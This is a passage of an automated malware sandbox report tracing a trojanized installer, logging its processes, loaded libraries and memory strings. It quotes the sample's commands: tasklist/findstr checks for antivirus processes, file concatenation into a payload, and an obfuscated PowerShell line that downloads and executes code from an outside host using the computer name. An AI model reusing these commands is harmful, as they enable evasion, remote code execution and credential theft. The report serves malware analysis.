PlatformInfobTargetPlatformCanUseCrashReporterDataDrivenPlatformInfo section [PreviewPlatform %s] must specify a PlatformNamePlatformName != NAME_NoneDataDrivenPlatformInfo section [PreviewPlatform %s] must specify a ShaderFormatItem.ShaderFormat != NAME_NoneEnabledCVarPlatformNameShaderFormatActiveIconPathActiveIconNameInactiveIconPathInactiveIconNameDeviceProfileNameMenuTextMenuTooltipIconTextPlatformInfo PreviewPlatform
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winZIP@33/35@5/3
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4532:120:WilError_03
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeFile created: C:\Users\user\AppData\Local\Temp\nscE6FA.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  Source: Lightweight.com, 00000017.00000003.1928897162.0000000003BFC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1928610163.0000000003CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\installer_1.05_36.4\" -spe -an -ai#7zMap8006:94:7zEvent16868
                  Source: unknownProcess created: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe "C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe"
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 709182
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Bet
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "brandon" M
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com Lightweight.com N
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                  Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\Read me before you start.txt
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass MZP
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 709182Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E BetJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "brandon" M Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose NJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com Lightweight.com NJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass MZPJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
